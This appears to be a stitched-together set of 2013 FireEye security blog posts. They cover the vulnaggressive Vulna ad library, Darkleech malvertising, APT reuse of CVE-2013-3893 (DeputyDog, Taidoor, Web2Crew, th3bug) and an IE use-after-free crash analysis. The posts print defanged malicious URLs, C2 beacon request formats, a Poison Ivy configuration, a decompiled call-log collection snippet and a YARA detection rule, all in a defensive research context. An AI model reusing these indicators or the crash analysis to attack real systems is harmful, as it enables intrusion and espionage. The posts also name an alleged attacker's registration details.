Though it is widely known that ad libraries present privacy risks such as collecting device identifiers (IMEI, IMSI, etc.) and location information, Vulna presents far more severe security issues. First, Vulna is aggressive—if instructed by its server, it will collect sensitive information such as text messages, phone call history, and contacts. It also performs dangerous operations such as executing dynamically downloaded code. Second, Vulna contains a number of diverse vulnerabilities. These vulnerabilities when exploited allow an attacker to utilize Vulna’s risky and aggressive functionality to conduct malicious activity, such as turning on the camera and taking pictures without user’s knowledge, stealing two-­factor authentication tokens sent via SMS, or turning the device into part of a botnet.

We coin the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics.

The following is a sample of the aggressive behaviors and vulnerabilities we have discovered in Vulna:

  • Aggressive Behaviors

    • In addition to collecting information used for targeting and tracking such as device identifiers and location, as many ad libraries do, Vulna also collects the device owner's email address and the list of apps installed on the device. Furthermore, Vulna has the ability to read text messages, phone call history, and contact list, and share this data publicly without any access control through a web service that it starts on the device.

    • Vulna will download arbitrary code and execute it when instructed by the remote server.

  • Vulnerabilities

    • Vulna transfers user’s private information over HTTP in plain text, which is vulnerable to eavesdropping attacks.

    • Vulna also uses unsecured HTTP for receiving commands and dynamically loaded code from its control server. An attacker can convert Vulna to a botnet by hijacking its HTTP traffic and serving malicious commands and code.

    • Vulna uses Android’s WebView with JavaScript-­to-­Java bindings in an insecure way. An attacker can exploit this vulnerability and serve malicious JavaScript code to perform harmful operations on the device. This vulnerability is an instance of a common JavaScript binding vulnerability which has been estimated to affect over 90% of Android devices.

Vulna’s aggressive behaviors and vulnerabilities expose Android users, especially enterprise users, to serious security threats. By exploiting Vulna’s vulnaggressive behaviors, an attacker could download and execute arbitrary code on a user’s device within Vulna's host app. From our study, many host apps containing Vulna have powerful permissions that allow controlling the camera; reading and/or writing SMS messages, phone call history, contacts, browser history and bookmarks; and creating icons on the home screen. An attacker could utilize these broad permissions to perform malicious actions. For example, attackers could:

  • steal two-factor authentication tokens sent via SMS
  • view photos and other files on the SD card
  • install icons used for phishing attacks on the home screen
  • delete files and destroy data on demand
  • impersonate the owner and send forged text messages to business partners
  • delete incoming text messages without the user’s knowledge
  • place phone calls
  • use the camera to take photos without the user’s knowledge
  • read bookmarks or change them to point to phishing sites

There are many possible ways an attacker could exploit Vulna’s vulnerabilities. One example is public WiFi hijacking: when the victim’s device connects to a public WiFi hotspot (such as at a coffee shop or an airport), an attacker nearby could eavesdrop on Vulna’s traffic and inject malicious commands and code.

Attackers can also conduct DNS hijacking to attack users around the world, as in the Syrian Electronic Army’s recent attacks targeting Twitter, the New York Times, and the Huffington Post. In a DNS hijacking attack, an attacker could modify the DNS records of Vulna’s ad servers to redirect visitors to their own control server, in order to gather information from or send malicious commands to Vulna on the victim’s device.

Despite the severe threats it poses, Vulna is stealthy and hard to detect:

  • Vulna receives commands from its ad server using data encoded in HTTP header fields instead of the HTTP response body.

  • Vulna obfuscates its code, which makes traditional analysis difficult.

  • Vulna's behaviors can be difficult to trigger using traditional analysis. For example, in one popular game, Vulna is executed only at certain points in the game, such as when a specific level is reached, as shown in the figure below. (The figure has been partially blurred to hide the identity of the app.) When Vulna is executed, the only effect visible to the user is the ad on top of the screen. However, Vulna quietly executes its risky behaviors in the background.

Vulna's screen shot

FireEye Mobile Threat Prevention applies a unique approach and technology that made it possible to discover the security issues outlined in this post quickly and accurately despite these challenges. We have provided information about the discovered security issues, the list of impacted apps, and suggestions to both Google and the vendor of Vulna. They have confirmed the issues and are actively addressing them.

In conclusion, we have discovered a new mobile threat from a popular ad library (codenamed "Vulna" for anonymity). This library is included in popular apps on Google Play which have more than 200 million downloads in total. Vulna is an instance of a rapidly-growing class of mobile threat, which we have termed vulnaggressive ad libraries. Vulnaggressive ad libraries are disturbingly aggressive at collecting users’ sensitive data and embedding capabilities to execute dangerous operations on demand, and they also contain different classes of vulnerabilities which allow attackers to utilize their aggressive behaviors to harm users. App developers using these third-party libraries are often not aware of the security issues in them. These threats are particularly serious for enterprise customers. Furthermore, this vulnaggressive characteristic is not limited to ad libraries; it also applies to other third-party components and apps.

Special thanks to FireEye team members Adrian Mettler, Peter Gilbert, Prashanth Mohan, and Andrew Osheroff for their valuable help on writing this blog. We also thank Zheng Bu and Raymond Wei for their valuable comments and feedback.

Appendix: Sample code snippet of collecting and sending call logs in Vulna


    // Decompiled snippet; braces and the elided list insertion have been
    // reconstructed for readability.
    class x implements Runnable {

        public void run() {
            // Collect the most recent outgoing call numbers...
            List localList = get_call_log();
            // ...(code that sends the collected log to the server elided)...
        }

        List get_call_log() {
            ArrayList localArrayList = new ArrayList();
            // Query the last 10 call-log entries, newest first.
            Cursor cur1 = getContentResolver().query(CallLog.Calls.CONTENT_URI,
                    new String[] { "number", "type", "date" }, null, null,
                    "date DESC limit 10");
            cur2 = cur1;
            if (cur2 != null) {
                int i = cur2.getColumnIndex("number");
                int j = cur2.getColumnIndex("type");
                while (cur2.moveToNext()) {
                    String str = cur2.getString(i);
                    // Type 2 is an outgoing call; collect each number once.
                    if ((cur2.getInt(j) == 2) && (!localArrayList.contains(str)))
                        localArrayList.add(str);
                }
            }
            return localArrayList;
        }
    }

Another Darkleech Campaign

Last week, our external careers website got us up close and personal with Darkleech and Blackhole.

The fun didn’t end there: this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL:


Again Darkleech was up to its tricks, injecting URLs and sending victims to a landing page belonging to the Blackhole Exploit Kit, one of the most popular and effective exploit kits available today. Blackhole wreaks havoc by exploiting vulnerabilities in client applications like IE, Java, and Adobe products; computers vulnerable to the exploits it launches are likely to become infected with one of several flavors of malware, including ransomware, Zeus/Zbot variants, and click-fraud trojans like ZeroAccess.

We started logging hits at 21:31:00 UTC on Sunday 09/22/2013. The campaign has been ongoing, peaking on Monday and tapering down throughout the week.

During most of the campaign’s run, delivery[.]globalcdnnode[.]com appeared to have gone dark: it stopped serving the exploit kit’s landing page as expected and then stopped resolving altogether, yet tons of requests kept flowing.

This left some scratching their heads as to whether the noise was a real threat.

Indeed, it was a real threat, as Blackhole showed up to the party a couple of days later; this was confirmed by actually witnessing a system get attacked on a subsequent visit to the URL.



Figure 1. – Session demonstrating exploit via IE browser and Java.


The server returned the (obfuscated) Blackhole Landing page; no 404 this time.


Figure 2 – Request and response to delivery[.]globalcdnnode[.]com.


The next stage was to load a new URL for the malicious jar file. At this point, the unpatched Windows XP system running vulnerable Java quickly succumbed to CVE-2013-0422.


Figure 3 – Packet capture showing JAR file being downloaded.


Figure 4. – Some of the Java class files visible in the downloaded Jar.


Even though our system was exploited and the browser was left in a hung state, it did not receive the payload. Given the sporadic availability during the week of both the host and exploit kit’s landing page, it’s possible the system is or was undergoing further setup and this is the prelude to yet another large-scale campaign.

We can’t say for sure but we know this is not the last time we will see it or the crimeware actor behind it.


Name: Alexey Prokopenko
Organization: home
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Email: alex1978a

By the way, this actor has a long history of malicious activity online too.

The campaign also appears to be abusing Amazon Web Services.
origin =
mail addr =

At time of this writing, the domain delivery[.]globalcdnnode[.]com was still resolving, using fast-flux DNS techniques to resolve to a different IP address every couple minutes, thwarting attempts at shutting down the domain by constantly being on the move.
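Fast-flux behavior like this can be spotted in passive DNS data by counting distinct answers for a domain over a short window. A crude Python heuristic over an invented observation log (timestamps and IPs are illustrative only):

```python
from datetime import datetime, timedelta

# Hypothetical passive-DNS observations for a suspect domain: (timestamp, A record).
observations = [
    (datetime(2013, 9, 27, 12, 0), "203.0.113.10"),
    (datetime(2013, 9, 27, 12, 2), "198.51.100.7"),
    (datetime(2013, 9, 27, 12, 4), "192.0.2.55"),
    (datetime(2013, 9, 27, 12, 6), "203.0.113.99"),
    (datetime(2013, 9, 27, 12, 8), "198.51.100.23"),
]

def looks_fast_flux(obs, window=timedelta(minutes=10), min_unique=4):
    """Crude heuristic: many distinct A records inside a short time window."""
    start = obs[0][0]
    in_window = [ip for ts, ip in obs if ts - start <= window]
    return len(set(in_window)) >= min_unique

print(looks_fast_flux(observations))  # True
```

A real detector would also weight TTLs and ASN diversity; the thresholds here are arbitrary.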


Figure 5. – The familiar Plesk control panel, residing on the server.

This was a widespread campaign, indirectly affecting many web sites via malvertising techniques. The referring hosts run the gamut from local radio stations to high profile news, sports, and shopping sites. Given the large amounts of web traffic these types of sites see, it’s not surprising there was a tidal wave of requests to delivery[.]globalcdnnode[.]com. Every time a page with the malvertisement was loaded, a request was made to hXXp://, in the background.

To give an example of what this activity looked like from DTI, you can see the numbers in the chart below.



Figure 6. – DTI graph showing number of Darkleech detections logged each day.

By using malvertising and/or posing as a legitimate advertiser or content delivery network, the bad guys infiltrate the web advertisement ecosystem. This results in their malicious content getting loaded in your browser, often in the background, while you browse sites that have nothing to do with the attack (as was the case with our careers site).

Imagine a scenario where a good portion of enterprise users have their home page set to a popular news website. More than likely, the main web page has advertisements, and some of those ads could be served from third-party advertiser networks and/or CDNs. If just one of those advertisements on the page is malicious, visitors to that page are at risk of redirection and/or infection, even though the news website’s server is itself clean.

So, when everybody shows up to work on Monday and opens their browsers, there could be a wave of clients making requests to exploit kit landing pages. If Darkleech is lurking in those advertisement waters, you could end up with a leech or two attached to your network.

Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

Since we first reported on Operation DeputyDog, at least three other Advanced Persistent Threat (APT) campaigns known as Web2Crew, Taidoor, and th3bug have made use of the same exploit to deliver their own payloads to their own targets. It is not uncommon for APT groups to hand off exploits to others lower on the zero-day food chain, especially after the exploit becomes publicly available. Thus, while the exploit may be the same, the APT groups using it are not otherwise related.

In addition, APT campaigns may reuse existing infrastructure for new attacks. There have been reports that the use of CVE-2013-3893 may have begun in July; however, this determination appears to be based solely on the fact that the CnC infrastructure used in DeputyDog had been previously used by the attackers. We have found no indication that the attackers used CVE-2013-3893 prior to August 23, 2013.

Exploit Reuse

Since the use of CVE-2013-3893 in Operation DeputyDog (which we can confirm happened by at least August 23, 2013), the same exploit was used by different threat actors.


On September 25, 2013, an actor we call Web2Crew utilized CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The exploit was hosted on a server in Taiwan ( and dropped a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the same server. In our recent paper, we document how to extract intelligence from Poison Ivy that can be used to cluster activity.

The Poison Ivy binary used in this attack was configured with the following properties:

ID: gua925

Group: gua925

DNS/Port: Direct:, Direct:,

Proxy DNS/Port:

Proxy Hijack: No

ActiveX Startup Key:

HKLM Startup Entry:

File Name:

Install Path: C:\Documents and Settings\Administrator\Desktop\runrun.exe

Keylog Path: C:\Documents and Settings\Administrator\Desktop\runrun

Inject: No

Process Mutex: ;A>6gi3lW

Key Logger Mutex:

ActiveX Startup: No

HKLM Startup: No

Copy To: No

Melt: No

Persistence: No

Keylogger: No

Password: LostC0ntrol2013~2014

This configuration matches other Web2Crew activity, particularly the ‘gua925’ ID. Some previous Web2Crew Poison Ivy samples have been configured with similar IDs, including:







Additionally, the IP address was used to host the command and control server in this attack. A number of known Web2Crew domains previously resolved to this same IP address between August 15 and August 29.

2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-21 2013-08-21
2013-08-29 2013-08-29
2013-08-29 2013-08-29
2013-08-29 2013-08-29
2013-08-29 2013-08-29

We observed the Web2Crew actor targeting a financial institution in this attack as well as in previous attacks.


The same exploit (CVE-2013-3893) has also been used by another, separate APT campaign. By at least September 26, 2013, a compromised Taiwanese government website was used to host the same exploit; however, the payload in this case was Taidoor (not DeputyDog malware). The decoded payload has an MD5 of 666603bd2073396b7545d8166d862396. The CnC servers are and

We found another instance of CVE-2013-3893 hosted at www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor binary with the MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6. This Taidoor sample connected to a command and control server at We found this sample targeting the same financial services firm targeted by the web2crew actor discussed above.

Both of these samples were the newer versions of Taidoor that we previously described here.


The actor we refer to as ‘th3bug’ also used CVE-2013-3893 in multiple attacks. Beginning on September 27, compromised websites hosting the Internet Explorer zero-day redirected victims to download a stage one payload (496171867521908540a26dc81b969266) from www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a single byte key of 0x95.

The stage 1 payload then downloaded a PoisonIvy payload (not DeputyDog malware) via the following request:

GET /dev/js/heap.php HTTP/1.1


User-Agent: Mozilla/4.0 (compatible)


Cache-Control: no-cache

The PoisonIvy payload then connected to a command and control server at

The deobfuscated stage 1 payload has an MD5 of 4017d0baa83c63ceff87cf634890a33f and was compiled on September 27, 2013. This may indicate that the th3bug actor customized the IE zero-day exploit code on September 27, 2013 – well after the actors responsible for the DeputyDog malware weaponized the same exploit.

Infrastructure Reuse

APT groups also reuse CnC infrastructure. It is not uncommon to see a payload call back to the same CnC even though it has been distributed via different means. For example, although the first reported use of CVE-2013-3893 in Operation DeputyDog was August 23, 2013, the CnC infrastructure had been used in earlier campaigns.

Specifically, one of the reported DeputyDog command and control servers located at had been used in a previous attack in July 2013. During this previous attack, likely executed by the same actor responsible for the DeputyDog campaign, the IP hosted a PoisonIvy control server and was used to target a gaming company as well as high-tech manufacturing company. There is no evidence to suggest that this July attack using Poison Ivy leveraged the same CVE-2013-3893 exploit.

We also observed usage of Trojan.APT.DeputyDog malware as early as March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary (b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in both the high-technology manufacturing and finance verticals. This DeputyDog binary called back to a command and control server at There is also no evidence in this case to suggest that this attack used the CVE-2013-3893 exploit.

This malware family and the CnC infrastructure are part of an ongoing campaign. Therefore, the fact that this infrastructure was active prior to the first reported use of CVE-2013-3893 does not necessarily indicate that this particular exploit was previously used. The actor responsible for the DeputyDog campaign employs a multitude of malware tools and utilizes a diverse command-and-control infrastructure.


The activity associated with specific APT campaigns can be clustered and tracked by unique indicators. There are a variety of different campaigns that sometimes make use of the same malware (or sometimes widely available malware such as PoisonIvy) and the same exploits. It is not uncommon for zero-day exploits to be handed down to additional APT campaigns after they have already been used.

  • The first observed usage of CVE-2013-3893, in Operation Deputy Dog, remains August 23, 2013. However, the C2 infrastructure had been used in previous attacks in July 2013.
  • The CVE-2013-3893 exploit has subsequently been used by at least three other APT campaigns: Taidoor, th3bug, and Web2Crew. However, other than the common use of the same exploit, these campaigns are otherwise unrelated.
  • We expect that CVE-2013-3893 will continue to be handed down to additional APT campaigns and may eventually find its way into the cyber-crime underground.

Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets

FireEye has discovered a campaign leveraging the recently announced zero-day CVE-2013-3893. This campaign, which we have labeled ‘Operation DeputyDog’, began as early as August 19, 2013 and appears to have targeted organizations in Japan. FireEye Labs has been continuously monitoring the activities of the threat actor responsible for this campaign. Analysis based on our Dynamic Threat Intelligence cluster shows that this current campaign leveraged command and control infrastructure that is related to the infrastructure used in the attack on Bit9.

Campaign Details

On September 17, 2013 Microsoft published details regarding a new zero-day exploit in Internet Explorer that was being used in targeted attacks. FireEye can confirm reports that these attacks were directed against entities in Japan. Furthermore, FireEye has discovered that the group responsible for this new operation is the same threat actor that compromised Bit9 in February 2013.

FireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a server in Hong Kong ( and was named “img20130823.jpg”. Although it had a .jpg file extension, it was not an image file. The file, when XORed with 0x95, was an executable (MD5: 8aba4b5184072f2a50cbc5ecfe326701).
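The XOR-decoding step described above is easy to reproduce. The sketch below is an illustration, not FireEye tooling; it applies the single-byte key 0x95 and checks for the "MZ" header that marks a Windows executable:

```python
def xor_decode(data: bytes, key: int = 0x95) -> bytes:
    # Single-byte XOR is its own inverse, so this both encodes and decodes.
    return bytes(b ^ key for b in data)

def looks_like_pe(decoded: bytes) -> bool:
    # A decoded Windows executable begins with the "MZ" DOS header.
    return decoded[:2] == b"MZ"
```

Usage would be along the lines of `looks_like_pe(xor_decode(open("img20130823.jpg", "rb").read()))`.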

Upon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5: 46fd936bada07819f61ec3790cb08e19) to this location:

C:\Documents and Settings\All Users\Application Data\28542CC0.dll

In order to maintain persistence, the original malware adds this registry key:


The registry key has this value:

rundll32.exe "C:\Documents and Settings\All Users\Application Data\28542CC0.dll",Launch

The malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea ( This callback traffic is HTTP over port 443 (typically used for HTTPS encrypted traffic; however, this traffic is neither HTTPS nor SSL encrypted). Instead, this clear-text callback traffic resembles this pattern:

POST /info.asp HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Agtid: [8 chars]08x

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)


Content-Length: 1045

Connection: Keep-Alive

Cache-Control: no-cache

[8 chars]08x&[Base64 Content]

The unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the POST content as well.
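A simple way to hunt for this beacon in captured HTTP traffic is to match the header shape described above. The regular expression below is a hypothetical sketch; the character class for the 8-character field is an assumption, since only its length is described:

```python
import re

# Match an "Agtid" header whose value is 8 characters followed by the
# literal "08x", as described in the post.
AGTID_RE = re.compile(r"^Agtid:\s*\S{8}08x\s*$", re.MULTILINE)

def has_deputydog_beacon(http_request: str) -> bool:
    return bool(AGTID_RE.search(http_request))
```

The same `[8 chars]08x` token also appears at the start of the POST body, so a fuller signature could check both locations.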

A second related sample was also delivered from on September 5, 2013. The sun.css file was a malicious executable with an MD5 of bd07926c72739bb7121cec8a2863ad87 and it communicated with the same communications protocol described above to the same command and control server at

Related Samples

We found that both droppers, bd07926c72739bb7121cec8a2863ad87 and 8aba4b5184072f2a50cbc5ecfe326701, were compiled on 2013-08-19 at 13:21:59 UTC. As we examined these files, we noticed a unique fingerprint.

These samples both had a string that may have been an artifact of the builder used to create the binaries. This string was “DGGYDSYRL”, which we refer to as “DeputyDog”. As such, we developed the following YARA signature, based on this unique attribute:

rule APT_DeputyDog_Strings
{
    meta:
        author = "FireEye Labs"
        version = "1.0"
        description = "detects string seen in samples used in 2013-3893 0day attacks"
        reference = "8aba4b5184072f2a50cbc5ecfe326701"

    strings:
        $mz = {4d 5a}
        $a = "DGGYDSYRL"

    condition:
        ($mz at 0) and $a
}
We used this signature to identify 5 other potentially related samples:

MD5 Compile Time (UTC) C2 Server
58dc05118ef8b11dcb5f5c596ab772fd 2013-08-19 13:21:58
4d257e569539973ab0bbafee8fb87582 2013-08-19 13:21:58
dbdb1032d7bb4757d6011fb1d077856c 2013-08-19 13:21:59
645e29b7c6319295ae8b13ce8575dc1d 2013-08-19 13:21:59
e9c73997694a897d3c6aadb26ed34797 2013-04-13 13:42:45

Note that all of the samples, except for e9c73997694a897d3c6aadb26ed34797, were compiled on 2013-08-19, within 1 second of each other.

We pivoted off the command and control IP addresses used by these samples and found the following known malicious domains recently pointed to

Domain First Seen Last Seen
2013-09-01 05:02:22 2013-09-01 08:25:22
2013-09-01 05:02:21 2013-09-01 08:25:24
2013-09-01 05:02:20 2013-09-01 08:25:22
2013-07-01 10:48:56 2013-07-09 05:00:03

Links to Previous Campaigns

According to Bit9, the attackers that penetrated their network dropped two variants of the HiKit rootkit. One of these HiKit samples connected to a command and control server at downloadmp3server[.]servemp3[.]com that resolved to This same IP address also hosted www[.]yahooeast[.]net, a known malicious domain, between March 6, 2012 and April 22, 2012.

The domain yahooeast[.]net was registered to This email address was also used to register blankchair[.]com – the domain that pointed to the IP, which is the callback associated with sample 58dc05118ef8b11dcb5f5c596ab772fd and has already been correlated with the attack leveraging the CVE-2013-3893 zero-day vulnerability.

Threat Actor Attribution



While these attackers have demonstrated access to previously unknown zero-day exploits and a robust set of malware payloads, it is still possible, using the techniques described above, for network defense professionals to develop a rich set of indicators that can be used to detect their attacks. This is the first part of our analysis; we will provide more detailed analysis of the other components of this attack in a subsequent blog post.

Darkleech Says Hello

There's never a dull day at FireEye -- even on the weekends. At approximately 7:29 AM PDT today, we were notified by several security researchers that a fireeye[.]com/careers HR link was inadvertently serving up a drive-by download exploit. Our internal security, IT operations team, and third-party partners quickly researched and discovered that the malicious code was not hosted directly on any FireEye web infrastructure, but rather, it was hosted on a third-party advertiser (aka "malvertisement") that was linked via one of our third-party web services. The team then responded and immediately removed links to the malicious code in conjunction with our partners in order to protect our website users. More information on this third-party compromise (of video.js) can be found here.

Technical Details

The full redirect looked like this:




(redirect to) -> hxxp://xxx[.]xxxxxxxx[.]com/career/


(calls) -> hxxp://vjs[.]zencdn[.]net/c/video.js (VULNERABLE JAVASCRIPT)

(calls) -> hxxp://cdn[.]adsbarscipt[.]com/links/jump/ (MALVERTISEMENT)

(calls) -> hxxp://209[.]239[.]127[.]185/591918d6c2e8ce3f53ed8b93fb0735cd

/face-book.php (EXPLOIT URL)

(drops) -> MD5: 01771c3500a5b1543f4fb43945337c7d




So what was this, anyway?

It turns out this attack was neither targeted nor a watering hole attack. Instead, it appears to be part of a recent wave of the Darkleech malware campaign, in which vulnerable third-party Horde/IMP Plesk Webmail servers were compromised and used to serve up Java exploits that ultimately drop the Reveton ransomware (similar to Urausy) -- though some AV engines report it as a Zeus Bot (Zbot) variant.

Do FireEye products detect this attack?

Yes, the initial infection vector, payload, and corresponding Reveton callbacks were fully detected across all FireEye products prior to this incident being reported to us. In fact, this particular Reveton sample has been reported by approximately 49 of our worldwide customers, so far. Further intelligence about this threat is listed below:

  • DTI Statistics for MD5: 01771c3500a5b1543f4fb43945337c7d
  • MD5 first seen by our customers: 2013-09-14 07:12:40 UTC
  • Number of unique worldwide FireEye Web MPS detections: 188+
  • Number of unique FireEye Web MPS customers reported/alerted on this sample: 49+
  • Number of industries affected: 12+

Industries affected by Reveton

Lastly, FireEye acknowledges and thanks security researchers Inaki Rodriguez and Stephanus J Alex Taidri for bringing this issue to our attention.

Technical Analysis of CVE-2013-3147

In July, Microsoft released a patch for a memory-corruption vulnerability in the Internet Explorer (IE) Web browser. The vulnerability enabled remote attackers to execute arbitrary code or cause a denial of service through a crafted or compromised website — also known as a drive-by download.

This vulnerability is particularly interesting because it is simple enough that even some tutorials on the web can trigger it, and it is unique to IE. The vulnerability exists in the onbeforeeditfocus event, which only Internet Explorer supports (detailed information can be found at


The vulnerability triggers when the document markup is manipulated inside the handler of the onbeforeeditfocus event. This leads to a crash in mshtml!CElement::BubbleBecomeCurrent when an instruction tries to access the freed pointer.

Following is the state of registers at the time of crash.

0:008> r

eax=00000004 ebx=00000000 ecx=06034f88 edx=80000035 esi=06082fb0

edi=048466a8 eip=636b31fe esp=037cf9b8 ebp=037cf9d4 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246


636b31fe 8b7604 mov esi,dword ptr [esi+4] ds:0023:06082fb4=????????

At this stage ESI holds the freed pointer.

0:008> !heap -p -a esi

address 06082fb0 found in

_DPH_HEAP_ROOT @ 141000

in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)

5802a58: 6082000 2000

7c927553 ntdll!RtlFreeHeap+0x000000f9

63625834 mshtml!CTreeNode::Release+0x0000002d

63640cea mshtml!PlainRelease+0x00000033

63662fec mshtml!CTreeNode::NodeRelease+0x0000002a

635bd2d4 mshtml!CElement::BecomeCurrent+0x00000145

636b31eb mshtml!CElement::BubbleBecomeCurrent+0x00000094

637eeb74 mshtml!CElement::BubbleBecomeCurrent+0x0000004c

636b5dd5 mshtml!CDoc::PumpMessage+0x0000096a

635f1fea mshtml!CDoc::OnMouseMessage+0x0000055d

635ef664 mshtml!CDoc::OnWindowMessage+0x000007af

6364207a mshtml!CServer::WndProc+0x00000078

7e418734 USER32!InternalCallWinProc+0x00000028

7e418816 USER32!UserCallWinProcCheckWow+0x00000150

7e4189cd USER32!DispatchMessageWorker+0x00000306

7e418a10 USER32!DispatchMessageW+0x0000000f

02562ec9 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000461

Following was the size of allocation where ESI is pointing:

ESI: 6082fb0

address 06082fb0 found in

_DPH_HEAP_ROOT @ 141000

in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)

5802a58: 6082fb0 4c - 6082000 2000

7c918f01 ntdll!RtlAllocateHeap+0x00000e64

635a8225 mshtml!CHtmRootParseCtx::BeginElement+0x00000030

635bc1e9 mshtml!CHtmTextParseCtx::BeginElement+0x0000006c

635a8420 mshtml!CHtmParse::BeginElement+0x000000b7

635a93b4 mshtml!CHtmParse::ParseBeginTag+0x000000fe

635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082

635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237

635a734c mshtml!CHtmPost::Exec+0x00000221

635ac2b8 mshtml!CHtmPost::Run+0x00000015

635ac21b mshtml!PostManExecute+0x000001fd

635cece9 mshtml!CPostManager::PostManOnTimer+0x00000134

6364de62 mshtml!GlobalWndOnMethodCall+0x000000fb

6363c3c5 mshtml!GlobalWndProc+0x00000183

7e418734 USER32!InternalCallWinProc+0x00000028

7e418816 USER32!UserCallWinProcCheckWow+0x00000150

7e4189cd USER32!DispatchMessageWorker+0x00000306

But the story doesn’t end here. The instruction on which we get the exception moves the pointer at [ESI+4] into ESI, so the pointer at [ESI+4] is worth examining. If we monitor ESI, we see the following sequence (note: the value of ESI differs from the previous one because this information was collected on a second run):

ESI: 48bafb0 [ESI+4]: 6050fb0 [[ESI+4]]: 5ff0fd0 [[[ESI+4]]]: 635ba8c0

ESI: 48bafb0 [ESI+4]: 0 <---------------------- Exception

The exception instruction is expecting 6050fb0 at [ESI+4]. But because the pointer is freed, we hit an exception. The address 6050fb0 is the pointer to object 5ff0fd0 of type 635ba8c0 as we can see in the above lines and can also verify with the below windbg command.

0:008> ln 635ba8c0

(635ba8c0) mshtml!CBodyElement::`vftable' | (637812c0) mshtml!CStackDataAry

<unsigned short,128>::`vftable'

Exact matches:

mshtml!CBodyElement::`vftable' = <no type information>

Possible Code Execution Path:

This situation can lead to code execution because the value at [ESI+4] propagates to the CElement::BecomeCurrent method, which in turn calls the CElement::Doc method to access the vftable and call a function.

Following is the disassembly of the faulty function:

Our program crashes here:






Here, a few checks determine the value of EBX. But EBX is also under the attacker's control, and its value remains the same as it was at the beginning of the function call.






This isn't the first IE vulnerability in which the CElement::Doc function has played a role; in at least one other past vulnerability, the CElement::Doc function played a key role in code execution.

(Thanks to my colleagues Abhishek Singh and Yichong Lin for their suggestions.)

Evasive Tactics: Taidoor

The Taidoor malware has been used in many ongoing cyber espionage campaigns. Its victims include government agencies, corporate entities, and think tanks, especially those with interests in Taiwan. [1] In a typical attack, targets receive a spear-phishing email which encourages them to open an attached file. If opened on a vulnerable system, malware is silently installed on the target’s computer while a decoy document with legitimate content is opened that is intended to alleviate any suspicions the target may have. Taidoor has been successfully compromising targets since 2008, and continues to be active today.

Despite being around for a long time – and quite well known – Taidoor is a constantly evolving, persistent threat. We observed significant tactical changes in 2011 and 2012, when the malicious email attachments did not drop the Taidoor malware directly, but instead dropped a “downloader” that then grabbed the traditional Taidoor malware from the Internet. [2]

Recently, we observed a new variant of Taidoor, which was used in targeted attacks. It has evolved in two ways. Instead of downloading the traditional Taidoor malware from a command-and-control (CnC) server, the “downloader” reaches out to Yahoo Blogs and retrieves encrypted text from blog posts. When decrypted by the “downloader”, this text is actually a modified version of the traditional Taidoor malware. This new version of Taidoor maintains similar behavior, but has been changed enough to avoid common network detection signatures.

Traditional Taidoor Malware

The Taidoor malware is traditionally delivered as an email attachment. If opened, the Taidoor malware is dropped onto the target’s system, and starts to beacon to a CnC server. Taidoor connects to its CnCs using HTTP, and the “GET” request has been consistent since 2008. It follows a simple pattern:

GET /[5 characters].php?id=[6 numbers][12 characters/numbers]

The last set of 12 characters is actually the encrypted MAC address of the compromised computer. The values of the MAC address are incremented by 1, and this is used as an RC4 key to encrypt the data that is passed between the compromised computer and its CnC server.
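The key-derivation scheme described above can be sketched as follows. Whether the increment applies to each raw byte of the MAC address is an assumption on our part; the RC4 routine itself is standard:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Standard RC4 (KSA + PRGA); encryption and decryption are identical.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def taidoor_key(mac: str) -> bytes:
    # Sketch of the key derivation described above: each byte of the MAC
    # address incremented by 1. Whether the increment applies to the raw
    # bytes or to their ASCII representation is an assumption here.
    raw = bytes.fromhex(mac.replace(":", ""))
    return bytes((b + 1) % 256 for b in raw)
```

Data exchanged with the CnC would then be encrypted as `rc4(taidoor_key(mac), data)`.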

The New Taidoor

In the past, other APT campaigns have used blog hosting platforms as a mechanism to transmit CnC server information to compromised targets. [3] Attackers using Taidoor have leveraged this model as well.

We analyzed a sample (be1d972819e0c5bf80bf1691cc563400) that when opened exploits a vulnerability in Microsoft Office (CVE-2012-0158) to drop malware on the target’s computer.


The decoy document contains background information on trade liberalization between the People’s Republic of China (PRC) and Taiwan.

The various strings in the file are XOR-encoded with the key "0x02" or "0x03".


This malware is a simple “downloader” that, instead of connecting to a CnC server, connects to a Yahoo Blog and downloads the contents of a blog post.


GET /jw!JRkdqkKGAh6MPj9MlwbK6iMgScE- HTTP/1.1

Accept: */*
